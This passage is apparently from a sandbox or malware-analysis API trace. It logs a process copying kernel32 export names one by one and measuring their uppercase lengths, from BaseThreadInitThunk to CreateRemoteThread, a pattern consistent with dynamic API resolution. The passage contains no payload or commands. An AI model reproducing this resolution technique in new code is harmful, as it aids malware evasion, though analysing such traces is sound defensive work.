lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0078.383] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0078.383] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0078.383] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0078.383] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0078.383] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0078.383] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0078.383] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0078.383] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0078.383] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0078.383] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0078.383] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0078.383] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0078.383] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0078.383] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0078.383] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0078.383] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0078.383] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0078.384] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0078.384] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0078.384] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0078.384] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0078.384] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0078.384] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0078.384] lstrlenA (lpString="BEEP") returned 4 [0078.384] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0078.384] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0078.384] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0078.384] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0078.384] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0078.384] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0078.384] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0078.384] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0078.384] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0078.384] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0078.384] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0078.384] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0078.384] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0078.384] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0078.384] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0078.384] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0078.384] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0078.384] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0078.384] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0078.384] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0078.384] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0078.384] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0078.384] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0078.384] lstrlenA (lpString="CANCELIO") returned 8 [0078.384] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0078.384] lstrlenA (lpString="CANCELIOEX") returned 10 [0078.384] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0078.384] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0078.384] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0078.385] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0078.385] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0078.385] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0078.385] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0078.385] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0078.385] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0078.385] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0078.385] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0078.385] lstrlenA (lpString="CHECKELEVATION") returned 14 [0078.385] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0078.385] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0078.385] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0078.385] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0078.385] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0078.385] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0078.385] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0078.385] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0078.385] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0078.385] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0078.385] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0078.385] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0078.385] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0078.385] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0078.385] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0078.385] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0078.385] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0078.385] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0078.385] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0078.385] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0078.385] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0078.385] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0078.385] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0078.385] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0078.385] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0078.385] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0078.385] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0078.386] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0078.386] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0078.386] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0078.386] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0078.386] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0078.386] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0078.386] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0078.386] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0078.386] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0078.386] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0078.386] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0078.386] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0078.386] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0078.386] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0078.386] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0078.386] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0078.386] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0078.386] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0078.386] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0078.386] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0078.386] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0078.386] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0078.386] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0078.386] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0078.386] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0078.387] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0078.387] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0078.387] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0078.387] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0078.387] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0078.387] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0078.387] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0078.387] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0078.387] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0078.387] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0078.387] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0078.387] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0078.387] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0078.387] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0078.387] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0078.387] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0078.387] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0078.387] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0078.387] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0078.387] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0078.387] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0078.387] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0078.387] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0078.387] lstrlenA (lpString="COPYCONTEXT") returned 11 [0078.387] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0078.387] lstrlenA (lpString="COPYFILEA") returned 9 [0078.387] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0078.387] lstrlenA (lpString="COPYFILEEXA") returned 11 [0078.387] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0078.387] lstrlenA (lpString="COPYFILEEXW") returned 11 [0078.387] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0078.387] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0078.387] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0078.387] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0078.387] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0078.387] lstrlenA (lpString="COPYFILEW") returned 9 [0078.387] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0078.388] lstrlenA (lpString="COPYLZFILE") returned 10 [0078.388] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0078.388] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0078.388] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0078.388] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0078.388] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0078.388] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0078.388] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0078.388] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0078.388] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0078.388] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0078.388] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0078.388] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0078.388] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0078.388] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0078.388] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0078.388] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0078.388] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0078.388] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0078.388] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0078.388] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0078.388] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0078.388] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0078.388] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0078.388] lstrlenA (lpString="CREATEEVENTA") returned 12 [0078.388] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0078.388] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0078.388] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0078.388] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0078.388] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0078.388] lstrlenA (lpString="CREATEEVENTW") returned 12 [0078.388] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0078.388] lstrlenA (lpString="CREATEFIBER") returned 11 [0078.388] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0078.388] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0078.389] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0078.389] lstrlenA (lpString="CREATEFILEA") returned 11 [0078.389] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0078.389] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0078.389] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0078.389] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0078.389] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0078.389] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0078.389] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0078.389] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0078.389] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0078.389] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0078.389] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0078.389] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0078.389] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0078.389] lstrlenA (lpString="CREATEFILEW") returned 11 [0078.389] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0078.389] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0078.389] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0078.389] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0078.389] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0078.389] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0078.389] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0078.389] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0078.389] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0078.389] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0078.389] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0078.389] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0078.389] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0078.389] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0078.389] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0078.389] lstrlenA (lpString="CREATEJOBSET") returned 12 [0078.389] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0078.389] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0078.389] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0078.390] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0078.390] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0078.390] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0078.390] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0078.390] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0078.390] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0078.390] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0078.390] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0078.390] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0078.390] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0078.390] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0078.390] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0078.390] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0078.390] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0078.390] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0078.390] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0078.390] lstrlenA (lpString="CREATEPIPE") returned 10 [0078.390] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0078.390] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0078.390] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0078.390] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0078.390] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0078.390] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0078.390] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0078.390] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0078.390] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0078.390] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0078.390] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0078.390] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0078.390] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0078.390] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0078.390] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0078.390] lstrlenA 